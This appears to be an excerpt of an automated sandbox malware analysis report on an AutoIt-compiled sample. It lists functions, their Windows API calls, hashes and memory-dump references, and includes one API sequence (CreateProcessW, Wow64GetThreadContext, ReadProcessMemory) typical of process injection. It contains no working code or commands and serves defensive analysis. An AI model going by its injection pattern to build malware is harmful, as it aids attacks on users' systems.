                                                            • Instruction ID: e66c27b5ce9d3e9fd0309dd4d9e64a1a0173ff74a6d4a5f55578cdb94be2dce8
                                                            • Opcode Fuzzy Hash: 73657cf6088ea9d55041d29277f676da50fa441a9f4eea237ef45e22c2b4808d
                                                            • Instruction Fuzzy Hash: EA918D75910219AFCF04EFA4CC919EDB7B4FF29314F14442AF816AB2A1EB70E915CB60
                                                            Function 001A35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,001A35A1,SwapMouseButtons,00000004,?), ref: 001A35D4
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,001A35A1,SwapMouseButtons,00000004,?,?,?,?,001A2754), ref: 001A35F5
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,001A35A1,SwapMouseButtons,00000004,?,?,?,?,001A2754), ref: 001A3617
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: f9b7228f2b640f25147f9dde08cbba9fd0da58d55c9a3a861fbac34d5b4f9b13
                                                            • Instruction ID: eaaa1a9ab2186cab65792fcee3b0f84d6a3b061012dc75f0626fa055ff03d398
                                                            • Opcode Fuzzy Hash: f9b7228f2b640f25147f9dde08cbba9fd0da58d55c9a3a861fbac34d5b4f9b13
                                                            • Instruction Fuzzy Hash: 14114879910208BFDB208FA4EC44EAFB7B8EF05740F01546AF809D7210E3719F419B60
                                                            Function 034D12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 034D1A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 034D1AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 034D1B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701993742.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_34d0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                                            • Instruction ID: 00eac28f4977dfc296ad89944f7d44123eb9fa3079c039cbb42ce1701cede94e
                                                            • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                                            • Instruction Fuzzy Hash: B1622B30A14258DBEB24CFA4C850BDEB376EF58700F1091A9D50DEB394E7769E81CB59
                                                            Function 002097E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A5045: _fseek.LIBCMT ref: 001A505D
                                                              • Part of subcall function 002099BE: _wcscmp.LIBCMT ref: 00209AAE
                                                              • Part of subcall function 002099BE: _wcscmp.LIBCMT ref: 00209AC1
                                                            • _free.LIBCMT ref: 0020992C
                                                            • _free.LIBCMT ref: 00209933
                                                            • _free.LIBCMT ref: 0020999E
                                                              • Part of subcall function 001C2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,001C9C64), ref: 001C2FA9
                                                              • Part of subcall function 001C2F95: GetLastError.KERNEL32(00000000,?,001C9C64), ref: 001C2FBB
                                                            • _free.LIBCMT ref: 002099A6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                            • String ID:
                                                            • API String ID: 1552873950-0
                                                            • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                            • Instruction ID: a79f310efffdb40e638235f75a652abfcd8b6cb41699078a029ad5a9c4de35c9
                                                            • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                            • Instruction Fuzzy Hash: 535160B1904358AFDF249F64CC41A9EBB7AEF58300F1004AEF649A7282DB715E90CF58
                                                            Function 001C493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                            • Instruction ID: 845fb2f6e83377286269880360ec613fe114172aebc3060051ea09bb81afe66f
                                                            • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                            • Instruction Fuzzy Hash: 1641D370A486169BDF28CEA9C8A0FAF77A6EFB4364B24813DE856C7640D770DD408B44
                                                            Function 001A4DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: AU3!P/#$EA06
                                                            • API String ID: 4104443479-3681569584
                                                            • Opcode ID: 2cfa23ebb6f979b3d3135a006af47a423a889faee9d824301130f4cc0dbea933
                                                            • Instruction ID: fec40e6560df0d47e44126a5cf5cea2759e1f9849d6cda994db5be82420d5446
                                                            • Opcode Fuzzy Hash: 2cfa23ebb6f979b3d3135a006af47a423a889faee9d824301130f4cc0dbea933
                                                            • Instruction Fuzzy Hash: CC418D79A04154ABDF269F648C517BE7FA6AFD7300F294065F8829B283C7F98D4083E1
                                                            Function 001A73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 001DEE62
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 001DEEAC
                                                              • Part of subcall function 001A48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001A48A1,?,?,001A37C0,?), ref: 001A48CE
                                                              • Part of subcall function 001C09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001C09F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                            • String ID: X
                                                            • API String ID: 3777226403-3081909835
                                                            • Opcode ID: a82b9bd9bc3c019851b52b9bad519ef3b6dfe8dbeae4fc21796351c9ef5821cb
                                                            • Instruction ID: 61c5d3b7d6a01be6431378e5a907e5709ae3b47c2643fe3c019d1582a3ffe816
                                                            • Opcode Fuzzy Hash: a82b9bd9bc3c019851b52b9bad519ef3b6dfe8dbeae4fc21796351c9ef5821cb
                                                            • Instruction Fuzzy Hash: DD21C6319102589BCB11DF94DC45BEE7BFC9F59315F00401AE808E7281DBB85A8D8FA1
                                                            Function 0020901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: d2472b79a9b2bca1be7e1386100545cb4c4c312b930d2698c0316a764d43cfbe
                                                            • Instruction ID: 8dad1b43df4a0cc6d9843cf2d58abd77ef4eba80185066ceb51cd57f462534b6
                                                            • Opcode Fuzzy Hash: d2472b79a9b2bca1be7e1386100545cb4c4c312b930d2698c0316a764d43cfbe
                                                            • Instruction Fuzzy Hash: 2D01F9718142187EDB28CAA8C816FEE7BF89B11301F00419EF552D2182E5B5E6188760
                                                            Function 00209B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00209B82
                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00209B99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: 3b9d6268fda33e2d76aa48f8fc378eac53aa2647c0a39c0727b8211ce94948cb
                                                            • Instruction ID: f7708ccce0dd17a0d87569e10091cd16e030900f5b42dc76d768ab422a8a78c3
                                                            • Opcode Fuzzy Hash: 3b9d6268fda33e2d76aa48f8fc378eac53aa2647c0a39c0727b8211ce94948cb
                                                            • Instruction Fuzzy Hash: F8D05E7954030DBBDB609BD0EC0EF9A773CE705701F0053B1BF54911A1DEB055A98BA5
                                                            Function 0021CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4efa4c2eac2fa30e0a44ec134d93499983ab3db22b2ac8915def0a38c7438df5
                                                            • Instruction ID: 4e86740cee7ff3b800bccf26ef26438c82bea6c3fadde987e0f2cca76fbe7631
                                                            • Opcode Fuzzy Hash: 4efa4c2eac2fa30e0a44ec134d93499983ab3db22b2ac8915def0a38c7438df5
                                                            • Instruction Fuzzy Hash: 4CF15774A18301DFC714DF28C480A6ABBE5FF99314F14892EF8999B252D771E985CF82
                                                            Function 001A43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 001A4401
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 001A44A6
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001A44C3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$_memset
                                                            • String ID:
                                                            • API String ID: 1505330794-0
                                                            • Opcode ID: 5a60b838ff5747261cc34af744c8ef950fa35dc3c12bb5d13d23761c97cf090e
                                                            • Instruction ID: 298ad95f575855ff6219299b7581ea3e7983de35896c263d0ce0dfec23bc96d3
                                                            • Opcode Fuzzy Hash: 5a60b838ff5747261cc34af744c8ef950fa35dc3c12bb5d13d23761c97cf090e
                                                            • Instruction Fuzzy Hash: C2318EB45043019FD761DF24E88879BBBF8FB89304F00092EE99A83241D7B1A948CB92
                                                            Function 001C594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __FF_MSGBANNER.LIBCMT ref: 001C5963
                                                              • Part of subcall function 001CA3AB: __NMSG_WRITE.LIBCMT ref: 001CA3D2
                                                              • Part of subcall function 001CA3AB: __NMSG_WRITE.LIBCMT ref: 001CA3DC
                                                            • __NMSG_WRITE.LIBCMT ref: 001C596A
                                                              • Part of subcall function 001CA408: GetModuleFileNameW.KERNEL32(00000000,002643BA,00000104,?,00000001,00000000), ref: 001CA49A
                                                              • Part of subcall function 001CA408: ___crtMessageBoxW.LIBCMT ref: 001CA548
                                                              • Part of subcall function 001C32DF: ___crtCorExitProcess.LIBCMT ref: 001C32E5
                                                              • Part of subcall function 001C32DF: ExitProcess.KERNEL32 ref: 001C32EE
                                                              • Part of subcall function 001C8D68: __getptd_noexit.LIBCMT ref: 001C8D68
                                                            • RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,00000000,?,?,?,001C1013,?), ref: 001C598F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1372826849-0
                                                            • Opcode ID: 87ec27929b2b26ac4570d4c80ec8344b6b237cb687b1a32ac3bef1f4586901cc
                                                            • Instruction ID: 130b510229da5a63387b78943caee6b6b1888beb65f5546a2a0331bc6402a078
                                                            • Opcode Fuzzy Hash: 87ec27929b2b26ac4570d4c80ec8344b6b237cb687b1a32ac3bef1f4586901cc
                                                            • Instruction Fuzzy Hash: EB01D231240A15DEE7253B64E856F6E725A9F72B38F51406EF4019A1C1DFB0FD818761
                                                            Function 00209B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,002097D2,?,?,?,?,?,00000004), ref: 00209B45
                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,002097D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00209B5B
                                                            • CloseHandle.KERNEL32(00000000,?,002097D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00209B62
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: b0ff642eaad6af98147d69d535c3a51b2c234af27719adef3fd51138b3ca87c8
                                                            • Instruction ID: bfbef0d12a85dc3451464a96c73824ce9ec8a5e24a760cc2ceabe1784ffa8be4
                                                            • Opcode Fuzzy Hash: b0ff642eaad6af98147d69d535c3a51b2c234af27719adef3fd51138b3ca87c8
                                                            • Instruction Fuzzy Hash: 0DE08632180314B7D7311F94FD0EFCA7B28AB05775F104230FB15690E087B125229798
                                                            Function 00208F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00208FA5
                                                              • Part of subcall function 001C2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,001C9C64), ref: 001C2FA9
                                                              • Part of subcall function 001C2F95: GetLastError.KERNEL32(00000000,?,001C9C64), ref: 001C2FBB
                                                            • _free.LIBCMT ref: 00208FB6
                                                            • _free.LIBCMT ref: 00208FC8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                            • Instruction ID: 5f6e761f403137fa00002db2ee3435f845bab1efdd5a5c4eabab276c8acc52b2
                                                            • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                            • Instruction Fuzzy Hash: D8E0C2A13087034BCB20B938AD04F8317FE0F58320708080DF449DB183CF30E8508024
                                                            Function 001AAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CALL
                                                            • API String ID: 0-4196123274
                                                            • Opcode ID: 7dca40872e3ac5a5696356ba4309695108876ca7f9f42eb2d0549a6a72e40054
                                                            • Instruction ID: 483b7c8cde057c3a62789e71a81819b51b3bcaad81112e06d61062b924c53552
                                                            • Opcode Fuzzy Hash: 7dca40872e3ac5a5696356ba4309695108876ca7f9f42eb2d0549a6a72e40054
                                                            • Instruction Fuzzy Hash: DF224778508241DFC729DF14C494B6ABBF1BF9A300F55895DF88A8B262D771ED81CB82
                                                            Function 001A492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 001A4992
                                                              • Part of subcall function 001C35AC: __lock.LIBCMT ref: 001C35B2
                                                              • Part of subcall function 001C35AC: DecodePointer.KERNEL32(00000001,?,001A49A7,001F81BC), ref: 001C35BE
                                                              • Part of subcall function 001C35AC: EncodePointer.KERNEL32(?,?,001A49A7,001F81BC), ref: 001C35C9
                                                              • Part of subcall function 001A4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 001A4A73
                                                              • Part of subcall function 001A4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001A4A88
                                                              • Part of subcall function 001A3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001A3B7A
                                                              • Part of subcall function 001A3B4C: IsDebuggerPresent.KERNEL32 ref: 001A3B8C
                                                              • Part of subcall function 001A3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,002662F8,002662E0,?,?), ref: 001A3BFD
                                                              • Part of subcall function 001A3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 001A3C81
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001A49D2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                            • String ID:
                                                            • API String ID: 1438897964-0
                                                            • Opcode ID: 4c8d8780040ece540e79e0c6c01c00cb36288db8875ed5d2957a131b528a7e13
                                                            • Instruction ID: 754faa1c85d7b8d16b0e68dfc64b34a5ffd0356f67efd9252677f7216b5fcd72
                                                            • Opcode Fuzzy Hash: 4c8d8780040ece540e79e0c6c01c00cb36288db8875ed5d2957a131b528a7e13
                                                            • Instruction Fuzzy Hash: BD118971908311ABC300EF68EC4990AFFF8EBA9710F00862EF455832B1DBB09655CB92
                                                            Function 001A5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,001A5981,?,?,?,?), ref: 001A5E27
                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,001A5981,?,?,?,?), ref: 001DE19C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
